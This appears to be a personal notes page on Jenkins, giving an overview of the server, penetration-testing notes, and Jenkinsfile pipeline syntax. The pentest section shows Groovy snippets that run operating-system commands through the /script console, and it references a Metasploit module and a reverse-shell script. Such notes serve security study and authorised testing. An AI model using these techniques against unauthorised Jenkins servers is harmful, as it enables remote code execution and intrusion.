Jenkins

Jenkins is an open-source automation server. It means that it's not a server hosting code, but it can be connected to a GIT server such as GitLab to process CI/CD workflows.

The biggest strength of Jenkins is that it has a great number of plugins, such as plugins to visualize CI results (tests, coverage...).

Jenkins is written in Java, while Groovy is often used for plugins and for configuration files. It runs on Apache Tomcat.

Ports 🐲: 8080 (HTTP) and 5000 (Master/Slave communication).

Jenkins can be connected to a database or LDAP.


Jenkins Pentester Notes ☠️

attacking_common_applications jenkins_security

Useful reference: pwn_jenkins (1.9k ⭐).

Enumeration

  • Try to access the login page (/login)

Foothold

  • Some Jenkins instances don't have authentication
  • Some Jenkins instances may allow us to create accounts

Exploitation

The /script endpoint can be used to run groovy code.

def command = "ls /"
def stdout = new StringBuffer(), stderr = new StringBuffer()
def process = command.execute()
process.consumeProcessOutput(stdout, stderr)
process.waitForOrKill(1000)
def exitCode = process.exitValue()
def output = stderr + stdout

println("Exit Code: ${exitCode}")
println("Output:\n${output}")

➑️ See also: revsh.groovy (0.1k ⭐).

Additional Notes For /script

Metasploit: exploit/multi/http/jenkins_script_console.

r = Runtime.getRuntime()
p = r.exec(["/bin/ls","-la"] as String[])
p.waitFor()
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • master/slaves (a.k.a. workers)
  • freestyle projects (web interface) vs pipeline jobs (as code)
  • Jenkinsfile (groovy)
  • /var/lib/jenkins3/
Basic file
pipeline {
    agent any
    stages {
        stage('xxx') {
            steps {
                git 'https://github.com/example/my-java-app.git'
                git branch: env.BRANCH_NAME, url: 'URL'
                sh 'xxx'
            }
        }
    }
}
Add options
    options {
        buildDiscarder(logRotator(numToKeepStr: '10', daysToKeepStr: '7'))
    }
Poll SCM or webhooks to trigger a pipeline
    triggers {
        cron('H H(0-7) * * 1-5')
        webhook('')
    }
Artifacts are the output of the build
    post {
        always {
            junit '*.xml'
        }
        success {
            archiveArtifacts '*.xml'
        }
    }
Bonus
stage('xxx') {
    when {
        branch 'development'
    }
}
// https://plugins.jenkins.io/warnings-ng/
recordIssues(
    tools: [clangTidy(pattern: 'clang-tidy-report.txt')]
)